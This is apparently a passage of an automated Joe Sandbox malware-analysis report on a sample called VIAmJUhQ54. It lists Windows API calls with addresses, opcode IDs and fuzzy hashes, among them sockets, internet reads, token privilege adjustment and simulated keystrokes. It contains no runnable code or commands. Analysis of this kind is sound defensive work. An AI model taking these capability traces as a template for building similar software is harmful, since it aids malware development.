                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: ($,2}$<2}$|
                                                                                • API String ID: 1659193697-1765862839
                                                                                • Opcode ID: ab1b63a6bb9ad000ac42f51daffdf6d874b51cf54e63b62c4470c8160a26fa1d
                                                                                • Instruction ID: 6e5354bca72ad73500335d089bcc2078eed3bd0fb3e44fc8a8ae6db3988f741c
                                                                                • Opcode Fuzzy Hash: ab1b63a6bb9ad000ac42f51daffdf6d874b51cf54e63b62c4470c8160a26fa1d
                                                                                • Instruction Fuzzy Hash: 8E322475A007059FC728CF69C484A6AB7F0FF48320B55C56EE89ADB3A2E774E941CB44
                                                                                APIs
                                                                                  • Part of subcall function 0077A82C: inet_addr.WSOCK32(00000000), ref: 0077A84E
                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00779296
                                                                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 007792B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 4170576061-0
                                                                                • Opcode ID: 1f652a3ca5b2cfb375542e72836feb5b75322a52aef34a7a3674e72f434b1883
                                                                                • Instruction ID: c738557c3e7725e29cf729ccc958febca113e1fefe6a202a24c0c3183332eb4a
                                                                                • Opcode Fuzzy Hash: 1f652a3ca5b2cfb375542e72836feb5b75322a52aef34a7a3674e72f434b1883
                                                                                • Instruction Fuzzy Hash: 8541C371600214EFEB14AB288846E7E77EDEF44764F14844CF956AB293CA789D018B91
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0076EB8A
                                                                                • _wcscmp.LIBCMT ref: 0076EBBA
                                                                                • _wcscmp.LIBCMT ref: 0076EBCF
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0076EBE0
                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0076EC0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 2387731787-0
                                                                                • Opcode ID: 02aaf1e940197020a59ff519fd9135c0a10df8094826e2dfc108c1193e32df3e
                                                                                • Instruction ID: 0996c612369e48e23acfcd2dede30c10bd98acace3bc2af00a4ac37c0266ad51
                                                                                • Opcode Fuzzy Hash: 02aaf1e940197020a59ff519fd9135c0a10df8094826e2dfc108c1193e32df3e
                                                                                • Instruction Fuzzy Hash: B741C075600301CFDB18DF28C495E99B3E4FF49324F10455DE95A8B3A2DB39AD45CB61
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                • String ID:
                                                                                • API String ID: 292994002-0
                                                                                • Opcode ID: 8de84f16aa070357c1d7b40a27d4799258c7fb0075aa387a79cdf484ce33f7bf
                                                                                • Instruction ID: 1ff33f4d7fd575cd9fccc137c0cdd684061c4c480db588824f4995f42a99ae7f
                                                                                • Opcode Fuzzy Hash: 8de84f16aa070357c1d7b40a27d4799258c7fb0075aa387a79cdf484ce33f7bf
                                                                                • Instruction Fuzzy Hash: FA118E31B40218ABE7216F26DC48A6A7799AF85760B44442DF84AD7242CF78AD0287A6
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0073E014,774D0AE0,0073DEF1,007BDC38,?,?), ref: 0073E02C
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0073E03E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                • API String ID: 2574300362-192647395
                                                                                • Opcode ID: ef6b12f1dc28d3b0a5c8ace1a3613e8b451a06b6a68b59594b6af1bcc4b001bd
                                                                                • Instruction ID: 6379cfe02d43a580ab5b7c1c45ca4bb928ee50bd50cab2022c207b0a63afd659
                                                                                • Opcode Fuzzy Hash: ef6b12f1dc28d3b0a5c8ace1a3613e8b451a06b6a68b59594b6af1bcc4b001bd
                                                                                • Instruction Fuzzy Hash: 44D0A7704007229FD7354F60EC0C61277E5AF11301F29841EE482D2691D7BCCC828F50
                                                                                APIs
                                                                                  • Part of subcall function 0073B34E: GetWindowLongW.USER32(?,000000EB), ref: 0073B35F
                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 0073B22F
                                                                                  • Part of subcall function 0073B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0073B5A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Proc$LongWindow
                                                                                • String ID:
                                                                                • API String ID: 2749884682-0
                                                                                • Opcode ID: da71c56e8a495dbfbf4b4d9f336e4c198f74075596d3aabf0e377aed5a132081
                                                                                • Instruction ID: c6117837bc2ed7df588108cad2b5eb190086d7aaaf46526989d85d77a68f06ae
                                                                                • Opcode Fuzzy Hash: da71c56e8a495dbfbf4b4d9f336e4c198f74075596d3aabf0e377aed5a132081
                                                                                • Instruction Fuzzy Hash: F0A13670514129FAFF28AB2AAC8DE7F296CFB86344F544219F602D6593DB2D9C109272
                                                                                APIs
                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007743BF,00000000), ref: 00774FA6
                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00774FD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                • String ID:
                                                                                • API String ID: 599397726-0
                                                                                • Opcode ID: 38c90d7c5982abe0ab200532bf52d18c1bdf2560e25bf49540a939547339db69
                                                                                • Instruction ID: cf6aa54676e8d0ed784b54affff57a87393fa6b297ee4f51d2e92359ecb97fa2
                                                                                • Opcode Fuzzy Hash: 38c90d7c5982abe0ab200532bf52d18c1bdf2560e25bf49540a939547339db69
                                                                                • Instruction Fuzzy Hash: 0741C971604609FFEF219F94CC85EBFB7BCEB40794F14802AF609A6141E7B99E41D6A0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID: \Q}
                                                                                • API String ID: 4104443479-401829714
                                                                                • Opcode ID: 0060747d08bfb80f777141fa474a8ed9af03346d57673ff080f26cec460024f3
                                                                                • Instruction ID: 3b5a0c84443c96c73670dd675bc695c53060ce3c9b9a1b88b37c8d359b0640cd
                                                                                • Opcode Fuzzy Hash: 0060747d08bfb80f777141fa474a8ed9af03346d57673ff080f26cec460024f3
                                                                                • Instruction Fuzzy Hash: 9FA27D70D05229CFDB28CF58D5806ADBBB1FF49310F2582A9D859AB391D7389E81DF90
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0076E20D
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0076E267
                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0076E2B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1682464887-0
                                                                                • Opcode ID: eba6f45d815524d5a429ff00a3c8b9d8ebeed887dfda3fba1cc9352bd8bf65a4
                                                                                • Instruction ID: 6ebc15a2bb7e5df4b9a0d410dea99522a63c60f2a129a739faa56877c27966e3
                                                                                • Opcode Fuzzy Hash: eba6f45d815524d5a429ff00a3c8b9d8ebeed887dfda3fba1cc9352bd8bf65a4
                                                                                • Instruction Fuzzy Hash: E7216035A00218EFCB00EFA5D884EEDBBB9FF49310F0484A9E906A7252DB359905CB54
                                                                                APIs
                                                                                  • Part of subcall function 0073F4EA: std::exception::exception.LIBCMT ref: 0073F51E
                                                                                  • Part of subcall function 0073F4EA: __CxxThrowException@8.LIBCMT ref: 0073F533
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0075B180
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0075B1AD
                                                                                • GetLastError.KERNEL32 ref: 0075B1BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 1922334811-0
                                                                                • Opcode ID: c5bacfe1509b2e241a2d1a778b201bba23e106d7b8afa8c6dc7d11b54445ff5b
                                                                                • Instruction ID: 3fb459e06c10e8748687351fe6d30b66a3a8920bdd30f79c1f17b7a73a8717a5
                                                                                • Opcode Fuzzy Hash: c5bacfe1509b2e241a2d1a778b201bba23e106d7b8afa8c6dc7d11b54445ff5b
                                                                                • Instruction Fuzzy Hash: F011BFB1800604AFE7289F64DC85D6BB7ADEB44311B20852EF45697241DBB8FC458B60
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00766623
                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00766664
                                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0076666F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                • String ID:
                                                                                • API String ID: 33631002-0
                                                                                • Opcode ID: f89cb9a20ac7f370b5b8f04c04ee1f778fd9296c2a2b0472bd91c2bd925517b4
                                                                                • Instruction ID: 95c3071d684c790231618de917e5cbd9fa911e78a13b31332584f1b2dc08cfe1
                                                                                • Opcode Fuzzy Hash: f89cb9a20ac7f370b5b8f04c04ee1f778fd9296c2a2b0472bd91c2bd925517b4
                                                                                • Instruction Fuzzy Hash: E0111E71E01228BFDB108FA5EC45BAEBBBCEB45B10F108156F901F6290D7B45E059BA5
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00767223
                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0076723A
                                                                                • FreeSid.ADVAPI32(?), ref: 0076724A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID:
                                                                                • API String ID: 3429775523-0
                                                                                • Opcode ID: ef80eae90dfd2203d63282b269fb910fe11d91c94e68ae22c29c8c3c9e494151
                                                                                • Instruction ID: 876a6ffad445e36d734167acf54fc2d6b91175c332c74eaaa77c06b7a39085dd
                                                                                • Opcode Fuzzy Hash: ef80eae90dfd2203d63282b269fb910fe11d91c94e68ae22c29c8c3c9e494151
                                                                                • Instruction Fuzzy Hash: 86F06D76A00208BFDF04DFF4CC89AEEBBB8FF08201F008469A602E2181E3749A048B15
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0076F599
                                                                                • FindClose.KERNEL32(00000000), ref: 0076F5C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: 5966d4cd1bce1f95082a728d84375b3e024f1e9fb5993255141f0c5b70ff95ab
                                                                                • Instruction ID: c3c18018e3d0652b802db167fb3374275536f27fbc8562bf456f5d437038715a
                                                                                • Opcode Fuzzy Hash: 5966d4cd1bce1f95082a728d84375b3e024f1e9fb5993255141f0c5b70ff95ab
                                                                                • Instruction Fuzzy Hash: 6E11C832600204DFD710EF28D849A6EB3E4FF85324F01C51EF9A6D7292CB34AD058B95
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0077BE6A,?,?,00000000,?), ref: 0076CEA7
                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0077BE6A,?,?,00000000,?), ref: 0076CEB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                • Opcode ID: ac5cd3372830c726f5d449d8c0b20d53abfb442e16689150d987fb09bf9c1bbf
                                                                                • Instruction ID: 733ceffd610575bc47baa96b04508ca02cce42ff7a8f6c11b6b82adc2c0d5d1e
                                                                                • Opcode Fuzzy Hash: ac5cd3372830c726f5d449d8c0b20d53abfb442e16689150d987fb09bf9c1bbf
                                                                                • Instruction Fuzzy Hash: 8DF08C31500229EBDB21ABA4DC49FFA776DBF093A1F008265F91AD6181D7789A40CBA0
                                                                                APIs
                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00764153
                                                                                • keybd_event.USER32(?,7707C0D0,?,00000000), ref: 00764166
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: InputSendkeybd_event
                                                                                • String ID:
                                                                                • API String ID: 3536248340-0
                                                                                • Opcode ID: f48c16ff2961cf1357df246fa76091708fbd9bfa1c78bde334a05d808119f37a
                                                                                • Instruction ID: 5fad8d19863e666a0cfebb1a655d8e275aecafa2c7fe4b891c67399ecd6868da
                                                                                • Opcode Fuzzy Hash: f48c16ff2961cf1357df246fa76091708fbd9bfa1c78bde334a05d808119f37a
                                                                                • Instruction Fuzzy Hash: 3AF0677080024DAFDB098FA4C805BBE7BB0EF01305F00800AF966A6192D7798A129FA4
                                                                                APIs
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0075ACC0), ref: 0075AB99
                                                                                • CloseHandle.KERNEL32(?,?,0075ACC0), ref: 0075ABAB
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                • String ID:
                                                                                • API String ID: 81990902-0
                                                                                • Opcode ID: f5d10cf6018a6a0d671e7689db4d170dd3515d48ecad052c0b3cc646e2c841de
                                                                                • Instruction ID: 46622977b9f93c5afb36ff1acb4f291bb30501e8073bea45d2c9746257f747fb
                                                                                • Opcode Fuzzy Hash: f5d10cf6018a6a0d671e7689db4d170dd3515d48ecad052c0b3cc646e2c841de
                                                                                • Instruction Fuzzy Hash: 60E0E675400510EFF7252F54EC09DB77BE9EF44361B10C529F85B81871DB6A5C90DB54
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00746DB3,-0000031A,?,?,00000001), ref: 007481B1
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007481BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: a743c1142665649ecfa2a03ec238873c4b84db042e3e078c5fc196cabd06e828
                                                                                • Instruction ID: 8b6827b35a9c2575f4fb3ff1a0b04bfc7e98f2dad5ad76f7ac489a12616169e6
                                                                                • Opcode Fuzzy Hash: a743c1142665649ecfa2a03ec238873c4b84db042e3e078c5fc196cabd06e828
                                                                                • Instruction Fuzzy Hash: 00B09231044608EBDF102BA1EC09B587F68EB8A652F008010F60E448618B7658108B9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 29ca5a0507c082e457417a33f01ea0ca16ab86423bb979dd3242dec60b837270
